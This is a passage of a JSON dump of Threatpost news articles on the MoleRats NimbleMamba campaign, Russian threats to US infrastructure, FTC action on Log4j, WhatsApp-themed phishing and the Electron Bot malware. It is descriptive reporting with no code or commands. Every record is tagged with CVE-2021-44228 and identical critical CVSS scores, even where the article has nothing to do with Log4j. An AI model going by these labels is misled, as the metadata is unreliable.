obtaining process information from the computer. Additionally, it can detect user interaction, such as looking for mouse movement.\u201d\n\nMoleRats is part of the Gaza Cybergang, an Arabic speaking, politically motivated collective of interrelated threat groups actively targeting the Middle East and North Africa. It\u2019s known for attacks using spyware and other malware aimed at gathering intelligence.\n\nResearchers from Zscaler have already observed MoleRats targeting prominent Palestinians, as well as activists and journalists in Turkey, with spyware [in a previously identified attack](<https://threatpost.com/molerats-apt-spy-bankers-politicians-journalists/177907/>) in January. That campaign used malicious files doctored up to look like legitimate content related to the Israeli-Palestine conflict.\n\n## **Variations of an Espionage Campaign**\n\nProofpoint outlined three types of emails using different tactics and URLs aimed at tricking victims into clicking on malicious links to download the ultimate payloads.\n\nOne, which they observed in November, shows MoleRats pretending to be the Quora website while using an actor-controlled Gmail account with an actor-controlled domain, they said.\n\nThe attack vector demonstrated a hallmark of the campaign, which is to use geofencing to target specific countries with the malicious payload rather than delivering it to everyone who clicks on the email\u2019s malicious link. The email appears to advertise Ugg boots for sale.\n\n\u201cThe malicious URL, such as https[:]//www[.]uggboots4sale[.]com/news15112021.php, in the phishing email was geofenced to the targeted countries,\u201d researchers wrote. \u201d If the target\u2019s IP address fits into the targeted region, the user would be redirected to the .RAR file download containing the latest TA402 implant, NimbleMamba. If outside the target area, the user would be redirected to a legitimate news site.\u201d\n\nThe second variation, called \u201cDropbox URL,\u201d was observed in December using \u201cmultiple phishing pretenses, including clickbait medical lures and ones allegedly sharing confidential geopolitical information,\u201d researchers wrote.\n\nThis variation also used a Gmail account controlled by TA402 to send the email, but shifted to Dropbox URLs to deliver the malicious .RAR files containing NimbleMamba. It also abandoned the use of geofencing, they said.\n\nMoreover, in this variation, researchers noticed that the threat actor also was using the cloud-based file-sharing service Dropbox for malware command and control (C2), which prompted them to notify Dropbox of the malicious activity so they could put an end to it, they said. MoleRats was seen using Dropbox for C2 in its previously identified attacks in January.\n\nThe third email used by attackers, observed in December and January, used socially engineered content specifically to lure targets. However, in this variation, MoleRats \u201cslightly adjusted their attack chain by inserting an additional actor-controlled WordPress URL,\u201d researchers wrote.\n\nThe WordPress site impersonates a news aggregator of the legitimate news site used in the first campaign variation, and likely redirects to the download site of the malicious .RAR files containing NimbleMamba if someone in the targeted region clicks on the link, researchers said.\n\n\u201cIf the source IP address does not align with the target region, the URL will redirect the recipient to a benign website, typically an Arabic-language news website,\u201d they added.\n\n## **NimbleMamba in Depth**\n\nThe most frequently delivered payload of the campaign, NimbleMamba, has some similarities between TA402\u2019s previously used deliverable, LastConn, but also some notable differences, researchers observed.\n\nBoth executables are written in C#, have base64 encoding within the C2 framework and use the Dropbox API for C2 communication. However, there appears to be little code overlap between the two, they said.\n\nNimbleMamba\u2019s use of guardrails to ensure that all infected victims are within TA402\u2019s target region also is unique, as is its use of the Dropbox API for both C2 as well as exfiltration, researchers wrote in the post.\n\n\u201cThe malware also contains multiple capabilities designed to complicate both automated and manual analysis,\u201d they wrote. \u201cBased on this, Proofpoint assesses NimbleMamba is actively being developed, is well-maintained, and designed for use in highly targeted intelligence collection campaigns.\u201d\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T14:03:18", "type": "threatpost", "title": "MoleRats APT Flaunts New Trojan in Latest Cyberespionage Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-09T14:03:18", "id": "THREATPOST:5F6690E820E1B143D99DD5974300C6FF", "href": "https://threatpost.com/molerats-apt-trojan-cyberespionage-campaign/178305/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-22T16:34:37", "description": "The Russian government is exploring \u201coptions for potential cyberattacks\u201d on critical infrastructure in the U.S., the White House warned on Monday, in retaliation for sanctions and other punishments as the war in Ukraine grinds on.\n\nOfficials said that its latest intelligence shows cyber-related \u201cpreparatory activity\u201d on the part of President Vladimir Putin\u2019s government, though White House deputy national security adviser for cyber and emerging technology Anne Neuberger emphasized that no concrete threat has been identified.\n\n\u201cTo be clear, there is no certainty there will be a cyber-incident on critical infrastructure,\u201d she told reporters [during a briefing](<https://thehill.com/homenews/administration/599072-white-house-warns-russia-prepping-possible-cyberattacks-on-us?rl=1>). She added, \u201cThere is no evidence of any specific cyberattack that we are anticipating. There is some preparatory activity that we\u2019re seeing and that is what we shared in a classified context with companies who we thought might be affected.\u201d\n\nThat observed prep work includes vulnerability scanning and website probing, she added, declining to add any specifics. She noted that officials were holding more detailed classified briefings with organizations they believe could be targeted.\n\n\u201cThe current conflict has put cybersecurity initiatives in hyperdrive, and today, industry leaders aren\u2019t just concerned about adversaries breaching critical infrastructure but losing access and control to them,\u201d Saket Modi, co-founder and CEO at Safe Security, said via email.\n\nIn tandem with the briefing, the White House released a cyber-preparedness fact sheet, and President Joe Biden [issued the following statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/statement-by-president-biden-on-our-nations-cybersecurity/>):\n\n_\u201cI have previously warned about the potential that Russia could conduct malicious cyber activity against the United States, including as a response to the unprecedented economic costs we\u2019ve imposed on Russia alongside our allies and partners. It\u2019s part of Russia\u2019s playbook. Today, my Administration is reiterating those warnings based on evolving intelligence that the Russian Government is exploring options for potential cyberattacks.\u201d_\n\nThe [fact sheet](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/fact-sheet-act-now-to-protect-against-potential-cyberattacks/>) contains basic advice for hardening cyber-defenses, including employee awareness education; implementing multifactor authentication; keeping patching up-to-date; ensuring backups for data; turning on encryption; red-team exercises; and updating security tools.\n\n\u201cThis is a call to action and a call to responsibility for all of us,\u201d Neuberger said, again citing a \u201cpotential shift in intention\u201d by Russia.\n\n## **Organizations Are Not Prepared for Russian Attacks**\n\nJason Rebholz, CISO at Corvus Insurance, noted that basic cyber-hardening should have begun long ago.\n\n\u201cThe White House\u2019s best practices echo security fundamentals \u2013 something every organization should strive for,\u201d he said via email. \u201cFor many organizations, the time to implement was several years ago, as the frequency and severity of attacks began to escalate. Like planting a tree, the best time to secure your organization was ten years ago. The next best time is today. Organizations that have not addressed the key items and hardened their cyber-defenses are at a significantly greater risk of compromise.\u201d\n\nBeyond the basics, there are other challenges in being prepared for an onslaught from Russia\u2019s [considerable cyber-arsenal](<https://threatpost.com/destructive-wiper-organizations-ukraine/178937/>), Modi said.\n\n\u201cWhile governments and businesses have started pivoting towards proactive cybersecurity, it is difficult to do so without addressing the three major challenges in cybersecurity that organizations face,\u201d he explained. \u201cThere are too many cybersecurity products that do not communicate with each other, and this siloed approach leads to managing cybersecurity reactively. Finally, despite increased attention on the need for a better disclosure mechanism of cyberattacks, cybersecurity communication continues to be a challenge since it often lacks a business context.\u201d\n\nMeanwhile, Danny Lopez, CEO at Glasswall, pointed out that the real risk involves zero-day exploits and other unknown threats.\n\n\u201cPutin is playing a long game. War is costly both in terms of human and economic terms. If we see a de-escalation of the situation on the ground, we are likely to see an escalation of cyber warfare,\u201d he told Threatpost. \u201cThere are no patches for [unknown zero-day] and they wreak havoc within hours, whilst the security services and technology industry tries to catch up. These are extremely dangerous to governments as well as businesses.\u201d\n\nThe bottom line is that organizations should assume that attacks are imminent, researchers concluded.\n\n\u201cIt is a confusing time that involves two nations that have historically possessed and demonstrated very good skills in the cybersecurity and cybercrime areas,\u201d noted Purandar Das, co-founder and CEO at Sotero, via email. \u201cCountries under duress have and will utilize cyberattacks as a way to retaliate and to get around sanctions. The U.S. being the face of such sanctions and a history of poorly protected infrastructure make it a tempting target. Add all this together and the warnings make a lot of sense.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-22T16:31:18", "type": "threatpost", "title": "Russia Lays Groundwork for Cyberattacks on U.S. Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-22T16:31:18", "id": "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "href": "https://threatpost.com/russia-cyberattacks-us-infrastructure/179037/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T19:44:48", "description": "The Federal Trade Commission (FTC) will muster its legal muscle to pursue companies and vendors that fail to protect consumer data [from the risks of](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) the Log4j vulnerabilities, it [warned](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) on Tuesday.\n\n\u201cThe FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future,\u201d according to the warning.\n\nThose companies that bungle consumer data, leaving vulnerabilities unpatched and thus opening the door to exploits and the resulting possible \u201closs or breach of personal information, financial loss and other irreversible harms,\u201d are risking consequences tied to weighty laws that have resulted in fat fines, the FTC said.\n\nIt mentioned, among others, the [Federal Trade Commission Act ](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>) and the [Gramm-Leach-Bliley Act](<https://threatpost.com/privacy-regulation-could-be-a-test-for-states-rights/138303/>). The FTC Act, the commission\u2019s primary statute, enables it to seek monetary redress and other relief for conduct injurious to consumers. [Gramm-Leach-Bliley](<https://www.ftc.gov/tips-advice/business-center/privacy-and-security/gramm-leach-bliley-act>) requires financial institutions to safeguard sensitive data.\n\n\u201c It is critical that companies and their vendors relying on Log4j act now, in order to reduce the likelihood of harm to consumers, and to avoid FTC legal action,\u201d the FTC urged.\n\nThe FTC means it: Its warning included a reference to the complaints against Equifax, which agreed to pay $700 million to settle actions by the FTC, the Consumer Financial Protection Bureau, and all fifty states over its infamous [2017 data leak](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (consumers\u2019 reaction at the time: [Make it hurt more](<https://threatpost.com/200k-sign-petition-against-equifax-data-breach-settlement/148560/>)).\n\nAccording to the Equifax complaint, its failure to patch a known vulnerability \u201cirreversibly exposed the personal information of 147 million consumers.\u201d Expect more of the same if your company fails to protect consumer data from exposure as a result of Log4Shell or whatever similar, known vulnerabilities crop up, it said.\n\nThe FTC advised companies to use [guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) from the Cybersecurity and Infrastructure Security Agency (CISA) to check if they\u2019re using Apache\u2019s Log4j logging library, which is at the heart of the cluster of vulnerabilities known as [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>).\n\nCompanies that find that they are using Log4j should do the following, CISA recommended:\n\n * Update your Log4j software package to the [most current version](<https://logging.apache.org/log4j/2.x/security.html>).\n * Consult [CISA guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) to mitigate this vulnerability.\n * Ensure remedial steps are taken to ensure that your company\u2019s practices do not violate the law. Failure to identify and patch instances of this software may violate [the FTC Act](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>).\n * Distribute this information to any relevant third-party subsidiaries that sell products or services to consumers who may be vulnerable.\n\nOn Dec. 17, CISA issued an [emergency directive](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache>) mandating federal civilian departments and agencies to immediately patch their internet-facing systems for the Log4j vulnerabilities by Thursday, Dec. 23. Federal agencies were given five more days \u2013 until Dec. 28 \u2013 to report Log4Shell-affected products, including vendor and app names and versions, along with what actions have been taken \u2013 e.g. updated, mitigated, removed from agency network \u2013 to block exploitation attempts.\n\nCISA provides a [dedicated page](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) for the Log4Shell flaws with patching information and has released a [Log4j scanner](<https://twitter.com/cisagov/status/1473401212468932609?s=12>) to hunt down potentially vulnerable web services.\n\n## The Log4j Fire Rages Unabated\n\nThe initial flaw \u2013 [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) \u2013 was discovered on Dec. 9 and came under attack within hours. As of Dec. 15, more than 1.8 million attacks, against [half of all corporate networks](<https://threatpost.com/log4j-attacks-state-actors-worm/177088/>), using at least 70 distinct malware families, had already been launched to exploit what became a trio of bugs:\n\n 1. The Log4Shell remote-code execution (RCE) bug that spawned [even nastier mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) and which led to \u2026\n 2. The [potential for denial-of-service](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) (DoS) in Apache\u2019s initial patch. Plus, there was \u2026\n 3. [A third bug](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>), a DoS flaw similar to Log4Shell in that it also affected the logging library. It differed in that it concerned Context Map lookups, not the Java Naming and Directory Interface (JNDI) lookups to an LDAP server involved in CVE-2021-44228: lookups that allow attackers to execute any code that\u2019s returned in the Log4Shell vulnerability.\n\nAt this point, the Conti ransomware gang has had a [full attack chain](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>) in place for weeks.\n\nIn a Monday update, Microsoft said that the end of December [brought no relief](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>): The company observed state-sponsored and cyber-criminal attackers probing systems for the Log4Shell flaw through month\u2019s end. \u201cMicrosoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities,\u201d Microsoft security researchers warned.\n\n\u201cExploitation attempts and testing have remained high during the last weeks of December. We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,\u201d the researchers said.\n\n## Hunting Down Log4j\n\nOne of the most challenging aspects of responding to the Log4j vulnerability is simply identifying the devices in an organization where Log4j is used. The word \u201cubiquitous\u201d has applied since the get-go.\n\n\u201cSince it is a cross-platform, widely used software library, there is incredible diversity in where and how it is deployed: it can be an application package installed by itself, bundled with another application package as just another file on disk or embedded in another application with no visible artifact,\u201d J.J. Guy, co-founder and CEO at Sevco Security, told Threatpost on Wednesday.\n\nHe added, \u201cEven worse, it is used in everything from cloud-managed services to server applications and even fixed-function, embedded devices. That internet-connected toaster is very likely vulnerable to Log4Shell.\u201d\n\nWe\u2019re just in the middle of the triage phase now, Guy said, where basic tools like systems-management or software-management tools to check for the file on disk can provide initial triage.\n\nOne question: What\u2019s the inventory of equipment that still needs to be triaged?\n\n\u201cFor organizational leaders, such as the board, CEO, CIO or CISO, to have confidence in those triage results requires they report not only the machines that have been triaged but also how many are pending triage,\u201d Guy remarked. \u201cReporting the \u2018pending triage\u2019 statistic requires a complete asset inventory, including which machines have been successfully triaged.\u201d\n\nHe called this \u201cone of the larger hidden challenges\u201d in every organization\u2019s response, given that so few have a comprehensive asset inventory, \u201cdespite the fact it has been a top requirement in every security compliance program for decades.\u201d\n\n[_Image courtesy of Quince Media._](<https://commons.wikimedia.org/wiki/File:3D_illustration_image_of_a_gavel_-_auction_hammer_-_free_to_use_in_your_projects_07.jpg>) [_Licensing details_](<https://creativecommons.org/licenses/by-sa/4.0/>)_. \n__ _ \n_**Password** **Reset: ****[On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):** Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. **[Register & stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)** \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T19:00:03", "type": "threatpost", "title": "FTC to Go After Companies that Ignore Log4j", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T19:00:03", "id": "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "href": "https://threatpost.com/ftc-pursue-companies-log4j/177368/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-06T14:36:47", "description": "Attackers are spoofing voice message notifications from WhatsApp in a [malicious phishing campaign](<https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/>) that uses a legitimate domain to spread an info-stealing malware, researchers have found.\n\nResearchers at cloud email security firm Armorblox discovered the malicious campaign [targeting Office 365](<https://threatpost.com/office-365-phishing-attack-financial-execs/164925/>) and Google Workspace accounts using emails sent from domain associated with the Center for Road Safety, an entity believed to reside within the Moscow, Russia region. The site itself is legitimate, as it\u2019s connected to the State Road Safety operations for Moscow and belongs to the Ministry of Internal Affairs of the Russian Federation, according to [a blog post](<https://www.armorblox.com/blog/whatsapp-voicemail-phishing-attack/>) published Tuesday.\n\nSo far, attackers have reached about 27,660 mailboxes with the campaign, which spoofs WhatsApp by informing victims they have a \u201cnew private voicemail\u201d from the chat app and includes a link purporting to allow them to play it, researchers said. Targeted organizations include healthcare, education and retail, researchers said.\n\nThe attack \u201cemploys a gamut of techniques to get past traditional email security filters and pass the eye tests of unsuspecting victims,\u201d Armorblox Product Marketing Manager Lauryn Cash wrote in the post.\n\nThose tactics include [social engineering](<https://threatpost.com/fbi-social-engineering-hacks-lead-to-millions-lost-to-wire-fraud/114453/>) by eliciting trust and urgency in the emails sent to victims; brand impersonation by spoofing WhatsApp; the exploitation of a legitimate domain from which to send the emails; and the replication of existing workflows, i.e. getting an email notification of a voice message, Cash explained.\n\n## **How It Works**\n\nPotential victims of the campaign receive an email with the title \u201cNew Incoming Voice message\u201d that includes a header in the email body reiterating this title. The email body spoofs a secure message from WhatsApp and tells the victim that he or she has received a new private voicemail, including a \u201cPlay\u201d button so they allegedly can listen to the message.\n\nThe domain of the email sender was \u201cmailman.cbddmo.ru,\u201d which Amorblox researchers linked to the center for road safety of the Moscow region page\u2013a legitimate site that allows the emails to [slip past](<https://threatpost.com/low-detection-phishing-kits-bypass-mfa/178208/>) both Microsoft and Google\u2019s authentication checks, they said. However, it\u2019s possible that attackers exploited a deprecated or old version of this organization\u2019s parent domain to send the malicious emails, they acknowledged.\n\nIf the recipient clicks the email\u2019s \u201cPlay\u201d link, he or she is redirected to a page that attempts to install a trojan horse JS/Kryptik\u2013a malicious obfuscated JavaScript code embedded in HTML pages that redirects the browser to a malicious URL and implements a specific exploit, according to the post.\n\nOnce the target lands on the malicious page, a prompt asks for confirmation that the victim is not a robot. Then, if the victim clicks \u201callow\u201d on the popup notification in the URL, a browser ad service can install the malicious payload as a Windows application, allowing it to bypass User Account Control.\n\n\u201cOnce the malware was installed \u2026 it can steal sensitive information like credentials that are stored within the browser,\u201d Cash wrote.\n\n## **Targeting Unsuspecting Consumers**\n\nWhile the campaign appears to be focused on consumers rather than businesses, it could be a threat to corporate networks if victims take the bait and the malware is installed, one security professional noted.\n\n\u201cThe complexity and sophistication of the techniques make it very hard for the average consumer to detect a malicious attempt,\u201d Purandar Das, CEO and co-founder at Sotero, an encryption-based data security solutions company, wrote in an email to Threatpost. \u201cYou could potentially see a path where they are able to collect business information once the malware is deployed and active.\u201d\n\n\u2018Targeting consumers is a successful path for cybercriminals, as people seem to let their guard down more with electronic communication than real-life communication, noted another security professional. The average person often falls for online scams if they are familiar with the social-media platform claiming to be the message sender,\u201d James McQuiggan, security awareness advocate at security firm KnowBe4, wrote in an email to Threatpost.\n\n\u201cWhen they see it, most people will recognize someone trying to scam them in real life,\u201d he said, citing an example of New York City street merchant trying to sell a passer-by a fake brand-name watch or handbag. \u201cMost people will know they are fake and carry on walking. McQuiggan observed.\n\nHowever, many people might not recognize an email claiming to have a voicemail from a popular messaging app or another social media platform is a scam and go along with it, he said.\n\n\u201cUsers are too accepting of emails,\u201d McQuiggan said. \u201cThere needs to be more education for everyone, not just within organizations, to spot electronic social engineering or scams, so it is apparent like someone who is trying to sell a fake watch or handbag on the street.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-06T12:37:47", "type": "threatpost", "title": "Attackers Spoof WhatsApp Voice-Message Alerts to Steal Info", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-06T12:37:47", "id": "THREATPOST:280ACEC9B5A634E74F3C321F272C3EF3", "href": "https://threatpost.com/attackers-whatsapp-voice-message/179244/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-24T20:38:32", "description": "A backdoor malware that can take over social-media accounts \u2013 including Facebook, Google and Soundcloud \u2013 has infiltrated Microsoft\u2019s official store by cloning popular games such as Temple Run or Subway Surfer.\n\nThe backdoor, dubbed Electron Bot, gives attackers complete control over compromised machines. Among the multiple evil deeds it can execute remotely, it enables its operators to register new accounts, log in, and comment on and like other social media posts \u2013 all in real time.\n\nIn a Thursday [report](<https://research.checkpoint.com/2022/new-malware-capable-of-controlling-social-media-accounts-infects-5000-machines-and-is-actively-being-distributed-via-gaming-applications-on-microsofts-official-store/>), Check Point Research (CPR) said that the malware has claimed more than 5,000 victims in 20 countries \u2013 most from Bermuda, Bulgaria, Russia, Spain and Sweden\u2013 in its actively ongoing onslaught.\n\nIt\u2019s mainly being distributed via the Microsoft store platform, hiding in dozens of infected apps \u2013 mostly games \u2013 that the attackers are \u201cconstantly\u201d uploading, CPR said.\n\nA Microsoft spokesperson told Threatpost on Thursday that \u201cWe are investigating this issue and will take appropriate action to protect customers.\u201d\n\n## **SEO Poisoning, Ad-Clicking and Fraud**\n\nAs for its endgame, CPR researchers described the newly discovered and analyzed Electron Bot backdoor as \u201ca modular SEO-poisoning malware\u201d used \u201cfor social-media promotion and click fraud.\u201d\n\nIn an SEO-poisoning attack, threat actors create malicious websites and use search-engine optimization tactics that force those sites to the top of search results.\n\nSEO poisoning, besides ginning up malicious sites\u2019 SEO showings, is also sold as a service to promote other websites\u2019 rankings. It can be just another tool in malware pushers\u2019 kit bags: In March 2021, for example, we saw Gootkit malware use Google SEO poisoning to [expand](<https://threatpost.com/malware-loader-google-seo-payload/164377/>) the number of payloads it delivers.\n\nElectron Bot also functions as an ad clicker, constantly clicking on remote websites to generate clicks on ads that generate pay-per-click (PPC) ad revenue.\n\nIt can also promote social-media accounts, such as YouTube and SoundCloud, to direct traffic to specific content, thereby jacking up view and ad-clicking for yet more PPC loot. Electron Bot can also promote online products: another way to generate PPC revenue or increase a store\u2019s rating for higher sales.\n\nThe Electron framework enables the bot to \u201cimitate human browsing behavior and evade website protections,\u201d CPR explained.\n\n## Electron: Quietly Buzzing for Years\n\nResearchers said that the first hint of the attackers having trespassed into Microsoft\u2019s app store came at the end of 2018, when an [ad-clicker](<https://threatpost.com/ad-fraud-iot-hack/144552/>) campaign was [discovered](<https://www.bleepingcomputer.com/news/security/ad-clicker-hiding-as-google-photos-app-found-in-microsoft-store/>) hiding in an app called \u201cAlbum by Google Photos\u201d \u2013 an app that its authors, audaciously enough, fraudulently pushed as being published by Google LLC.\n\nThe malware has gotten bigger and brawnier over the years. The bot gets its name from [Electron](<https://www.electronjs.org/>), an open-source framework for building cross-platform, native desktop applications using web technologies such as JavaScript.\n\nThe bot hides by having most of its controlling scripts load dynamically at run time from the attackers\u2019 servers, CPR said. This approach keeps the malware nimble, too, they said: \u201cThis enables the attackers to modify the malware\u2019s payload and change the bots\u2019 behavior at any given time.\u201d\n\nWhile the bot\u2019s current activities on infected machines aren\u2019t terribly high-risk, researchers noted, the malware could do far worse, given the Electron framework\u2019s granting of access to all computer resources, including GPU computing.\n\n\u201cAs the bot\u2019s payload is loaded dynamically at every run time, the attackers can modify the code and change the bots behavior to high-risk,\u201d they said. \u201cFor example, they can initialize another second stage and drop a new malware such as ransomware or a [remote-access trojan, or RAT]. All of this can happen without the victim\u2019s knowledge.\u201d\n\n## Electron Bot Infection Routine\n\nThe infection starts when a victim installs an infected app from the Microsoft Store.\n\n\u201cWhen the user launches the game, a JavaScript dropper is loaded dynamically in the background from the attackers\u2019 server,\u201d according to CPR. \u201cIt then executes several actions including downloading and installing the malware and gaining persistency on the startup folder.\u201d\n\nWhen the infected system next starts up, the malware launches, establishes a connection with the command-and-control server (C2), and receives a dynamic JavaScript payload with a set of capability functions. Finally, the C2 sends the configuration file commands to execute.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/24123550/Electronc-Bot-infection-chain-e1645724162827.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/24123550/Electronc-Bot-infection-chain-e1645724162827.jpg>)\n\nElectron bot infection chain. Source: CPR.\n\nCPR used the popular Temple Endless Runner 2 game as an example of the games cloned by the Electron Bot attackers. This particular game involves an \u201cinfinite\u201d runner, escaping from an enemy by crossing cliffs, forests and mines; evil ape monsters in hot pursuit; a photosensitive seizure warning; and about 100 reviews.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/24124502/Temple-Endless-Runner-game-e1645724715406.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/24124502/Temple-Endless-Runner-game-e1645724715406.jpg>)\n\nThe popular Temple Endless Runner 2 game cloned by the Electron Bot operators. Source: CPR.\n\n## Click-Happy App Store Customers, Beware\n\nIt\u2019s that kind of (potentially seizure-inducing) popularity that gets us into trouble.\n\nAs it is, official app stores are rife with [fraud, fleecewear](<https://threatpost.com/apple-app-store-fraud-fleeceware/166703/>) and [banking trojans](<https://threatpost.com/gaming-banking-trojans-mobile-malware/178571/>). The latest of the lot is the 